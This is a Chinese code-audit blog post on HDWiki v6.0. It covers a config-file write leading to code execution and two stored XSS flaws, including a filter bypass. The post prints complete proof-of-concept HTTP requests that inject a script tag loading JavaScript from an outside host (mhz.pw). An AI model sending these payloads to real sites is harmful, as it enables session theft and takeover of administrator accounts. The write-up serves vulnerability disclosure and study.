代码审计| HDWiki 漏洞(一)

最新推荐文章于 2024-04-18 10:18:00 发布
最新推荐文章于 2024-04-18 10:18:00 发布
阅读量122 收藏
点赞数
文章标签: php xhtml 前端 ViewUI

i春秋核心白帽:yanzm

 

0×00 背景

最近拿到一个源码素材于是对这个源码进行分析发现了不少漏洞本篇先将一些漏洞进行分析下一篇再进行GetShell方法的分析期待和师傅们的交流。

0×01 漏洞分析

配置文件写入

0×00 相关环境

源码信息HDWiki-v6.0UTF8-20170209 

问题文件 \HDWiki-v6.0UTF8-20170209\hdwiki\install\install.php 

漏洞类型配置文件写入导致代码执行 

站点地址http://kaiyuan.hudong.com/

0×01 漏洞分析

在文件\HDWiki-v6.0UTF8-20170209\hdwiki\install\install.php的第291-310行中发现如下代码块其中传入的数据库连接等信息没有经过安全处理直接拼接然后使用fwrite函数将拼接后的内容写入到配置文件中,因此此处存在代码执行漏洞。

image.png

通过反向跟踪$configfile,$site_url的数据知道写入文件的名称是config.php,还有$site_url的参数是获取Host头的值。 

在\HDWiki-v6.0UTF8-20170209\hdwiki\install\install.php

image.png

image.png

 

0×02 漏洞复现

可以写入代码的位置有dbhost,dbuser,dbpassword,dbname,table_prefix,Host这里我直接将代码植入到Host中。进行如下请求将恶意代码写入到配置文件中由于配置文件没有设置访问权限所以写入后可以直接前台访问。

image.png

写入后访问config.php 可以直接前台进行代码执行。

 

image.png

image.png

XSS注入

0×00 相关环境

源码信息HDWiki-v6.0UTF8-20170209 

问题文件 \hdwiki\control\user.php 

漏洞类型存储型XSS注入 

站点地址http://kaiyuan.hudong.com/

0×01 漏洞分析

在文件\hdwiki\control\user.php中的第50-56行中发现如下代码块通过分析和数据跟踪发现$email存在安全问题在第54行中接收email的值然后进行引号的转义处理后进入到了第56行中的docheck中。

image.png

跟入docheck方法在文件\hdwiki\control\user.php中的第199行中使用docheckemail方法对$email进行检测。

image.png

跟入docheckemail方法,在文件\hdwiki\control\user.php中的第254-271行中发现该方法的代码块通过分析该方法的可以知道并没有对HTML或者JS代码/字符进行安全处理所以此处存在存储型XSS。

image.png

0×02 漏洞复现

由于邮箱的长度有限制但是可以使用短域名突破。

POST /index.php?user-register HTTP/1.1

Host: 127.0.0.1:8081

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: [url]http://127.0.0.1:8081/index.php?user-register[/url]

Content-Type: application/x-www-form-urlencoded

Content-Length: 143

Cookie: hd_sid=2ny184; hd_auth=7eecQnwVHW%2FA9biNTw4cASoUikKxWJr4gHY9sz1QoHE50i5%2Bf92UQu6AOs9y1wk0RIqYiuWGCV2mX32jUwwn; PHPSESSID=14uuv4iobaociig610qksae2v0

Connection: close

Upgrade-Insecure-Requests: 1

 

username=Thinking&password=Thinking&repassword=Thinking&email=<script src=http://mhz.pw/G></script>&agree=on&fromuid=&submit=%E6%8F%90%E4%BA%A4

 

当管理员登录后台进行用户管理便会触发JS代码。

1×00 相关环境

源码信息HDWiki-v6.0UTF8-20170209 

问题文件\hdwiki\control\doc.php 

漏洞类型存储型XSS注入 

站点地址http://kaiyuan.hudong.com/

1×01 漏洞分析

在文件\hdwiki\control\doc.php中的第413行中发现doedit方法在对词条进行编辑的时候过滤危险字符的函数可以被绕过导致可以直接引入前端代码造成存储型XSS在文件的第534行中使用了stripscript方法对传入的内容进行安全处理。

image.png

跟入stripscript在\hdwiki\lib\string.class.php文件的第227行中发现该方法分析该方法可以知道该方法是将符合$pregfind的正则内容替换为空因此可以通过如下方法进行绕过。

image.png

绕过方法

image.png

1×02 漏洞复现

首先注册一个用户再创建一个词条然后对词条进行编辑也就是在content参数中植入js代码绕过方法就是在最后一个script后加上空格然后提交。

 

POST /index.php?doc-edit HTTP/1.1

Host: 127.0.0.1:8081

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: [url]http://127.0.0.1:8081/index.php?doc-edit-59[/url]

Content-Type: multipart/form-data; boundary=—————————114782935826962

Content-Length: 1332

Cookie: PHPSESSID=14uuv4iobaociig610qksae2v0; hd_sid=HbPBd8; hd_auth=0737U4o9dWt5bzx9M%2BcQJZYvE1vO7shf%2Bej%2BpJtLa4eIXyCXC4r7pEHAk1KUQg%2Fh3G8yJtxK1dhL1FuFp1crdw

Connection: close

Upgrade-Insecure-Requests: 1

 

—————————–114782935826962

Content-Disposition: form-data; name=”did”

 

59

—————————–114782935826962

Content-Disposition: form-data; name=”section_id”

 

 

—————————–114782935826962

Content-Disposition: form-data; name=”create_submit”

 

1

—————————–114782935826962

Content-Disposition: form-data; name=”title”

 

Thinking test buibui

—————————–114782935826962

Content-Disposition: form-data; name=”category”

 

0

—————————–114782935826962

Content-Disposition: form-data; name=”_token”

 

y5IIiyfoKxH5dcU90S38sG2STGfHqmkF

—————————–114782935826962

Content-Disposition: form-data; name=”summary”

 

xss

—————————–114782935826962

Content-Disposition: form-data; name=”content”

 

<p>hello world!<br /><br /></p><script src=http://mhz.pw/G></script >

—————————–114782935826962

Content-Disposition: form-data; name=”tags”

 

A

—————————–114782935826962

Content-Disposition: form-data; name=”code”

 

 

—————————–114782935826962

Content-Disposition: form-data; name=”editreason[]“

 

A

—————————–114782935826962

Content-Disposition: form-data; name=”publishsubmit”

 

å‘布

—————————–114782935826962–

 

 

当用户或者管理员访问这个词条后就可以执行JS脚本了。

image.png

image.png

0×02 小小总结

本篇只分析了发现的部分漏洞该源码的问题不少感兴趣的伙伴们可以自行挖掘试试至于GetShell的方法有好几个后篇再和大家分享吧期待和师傅们的交流讨论师傅们有更好的思路期待能一起交流讨论但是如果是hc请走开勿扰交流学习可联系我。>>>点击跳转

weixin_33980459
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HDWiki 5.1 任意用户密码修改漏洞及修复
04-02
HDWiki 5.1 任意用户密码修改漏洞及修复
HDwiki文件上传导致远程代码执行漏洞
weixin_30293135的博客
08-19 189
漏洞版本: HDwiki(2011) 漏洞描述: 互动维客开源系统(HDwiki)作为中国第一家拥有自主知识产权的中文维基(Wiki)系统,由互动在线(北京)科技有限公司于2006 年11月28日正式推出,力争为给国内外众多的维基(Wiki)爱好者提供一个免费、易用、功能强大的维基(Wiki)建站系统 lib/file.class.php中 function uplo...
hdwiki 5.0漏洞修复(补充中。。)
blrk
07-03 1826
1、 漏洞:编辑词条,上传图片,服务端未作类型判断,导致直接上传php文件,从而获取webshell。 修复:修改文件wiki/control/attachment.php     // 禁止上传除了jgp、gif、png后缀的其他文件     if ($extname != "jpg" && $extname != "gif" && $extname != "png")     {
HDwiki 安装出现问题的漏洞整理
01-28
在安装HDwiki的过程中需要更改一些文件源码 才能运行 在此搜索做了整理 望能帮助
hdwiki_php5.4懒人包
09-28
官网hdwiki系统不支持php5.4及其以上版本,需要对代码稍作修改。该资源已经对立面代码做了更改,可以直接使用。
互动百科代码hdwiki
09-12
互动维客开源系统(HDwiki)作为中国第一家拥有自主知识产权的中文维基(Wiki)系统,由互动在线(北京)科技有限公司于2006 年11月28日正式推出,力争为给国内外众多的维基(Wiki)爱好者提供一个免费、易用、功能...
HDWiki 互动百科 v6.0 GBK
11-30
互动百科HDWiki是专为中文用户设计和开发,程序源代码100%完全开放的一个采用 PHP 和 MySQL 数据库构建的高效的中文百科建站解决方案,在尊重版权的前提下能极大的满足对于网站程
【Java代码审计】S2-045 远程代码执行漏洞分析复现
大河之犬的博客
04-03 1139
值得注意的是,getMessage 方法是需要一个 bundleName 参数的,在上层函数中我们可以知道该参数是由 aClass 赋值的,在整个触发流程中 aClass 是一个 File 异常类,并且这个类在 Collections 中是找不到的。类),但是 Jakarta 插件在处理文件上传(multipart)的请求时会捕捉异常信息,并对异常信息进行 OGNL 表达式处理。可以看到这里构造并执行了 OGNL 表达式,也就是说,我们的有效载荷将在这里被执行。那么,parse又是在哪里被调用的呢?
HDWiki 5.0 源码
12-30
HDWiki 5.0 源码 编码格式UTF8
HDWiki5.0用户手册(中文CHM)
07-22
资源名称:HDWiki 5.0 用户手册(中文CHM)内容简介:1、安装说明2、使用帮助3、开发指南4、二次开发帮助5、插件6、API说明注意:如果出现不能打开的情况,请 右键--属性--解除锁定! 资源截图: 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
HDWiki-6.0-UTF8_everywhere397_wiki_维基8_1983utf_
10-03
国内功能最全的wiki网站代码,画面简洁,安装简单。
PHP百科管理系统HDWikiv6.0UTF8
07-25
互动百科HDWiki是专为中文用户设计和开发,程序源代码100%完全开放的一个采用 PHP 和 MySQL 数据库构建的高效的中文百科建站解决方案,在尊重版权的前提下能极大的满足站长对于网站程序进行二次开发。HDwiki作为中国第一款拥有自主知识产权的中文Wiki系统,由互动在线(北京)科技有限公司(www.baike.com)于2006年11月28 日正式推出,力争为给众多的 Wiki 爱好者提
html中设置content-disposition,Content-Disposition
weixin_31358991的博客
06-15 4106
Content-Disposition在常规 HTTP 响应中,Content-Disposition响应标头是指示内容是否预期在浏览器中内联显示的标题,即,作为网页或作为网页的一部分或作为附件下载并且本地保存。在一个multipart/form-data正文中,HTTP Content-Disposition通用标题是一个标题,可以在多部分主体的子部分中使用,以提供有关它适用的字段的信息。子部分...
【Java代码审计】XSS漏洞产生原理及其修复
m0_62783065的博客
05-17 4111
【Java代码审计】XSS漏洞产生原理及其修复
hdwiki can not connect to mysql_discuz首页打开显示Can not connect to MySQL server解决方法
weixin_29201313的博客
01-18 367
discuz建站的网站首页打开,出错如下错误:Discuz! info: Can not connect to MySQL serverTime: 2009-1-30 11:45amScript: /index.phpError: Too many connectionsErrno.: 1040Similar error report has beed dispatched to administ...
抓取电商产品数据的方法|PHP|Python多语言环境|高并发需求|电商商品API接口数据采集
TinagirlAPI的博客
04-17 345
解决方案:集成订单管理系统和物流跟踪功能,让客户能够方便地处理订单、发货,并为用户提供实时的物流跟踪信息。- 解决方案:支持信用卡、借记卡、PayPal等流行的在线支付方式,确保用户可以选择最适合自己的付款方式。- 解决方案:采用高性能的服务器、CDN加速服务、优化网站代码等措施,确保网站能够快速响应并保持稳定性。- 解决方案:整合营销工具,如优惠券系统、积分奖励、折扣活动等,提供多样的促销方式来吸引客户。- 解决方案:采用SSL加密技术保护网站的安全性,遵守相关法规和标准,确保用户数据安全。
upload-labs
最新发布
XiaoYeZhu_1314的博客
04-18 186
完成upload靶场,通过中国蚁剑读取服务器的目录
网安DOS命令(基础)
sww1314521的博客
04-16 1191
在访问网站的时候,在浏览器中输入了域名以后,浏览器会自动将域名转换成IP地址,这个转换过。:命令执行结果,以数字的方式来显示【工作中强烈建议用这选项,否则会导致命令执行特别慢】批处理就是一个文本文件,在文件中可以写多个要执行dos命令,所有的命令会依次进行执行。arp的作用是显示和当前主机通信过的其他主机的地址。关闭回显,不显示要执行的命令,只显示命令的执行结果。:计算机和其他计算机进行通信的时候的数据的出入口。管道符的作用就是链接两个命令,将前面命令的。:显示这个网络连接的进程的进程信息,包括进程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值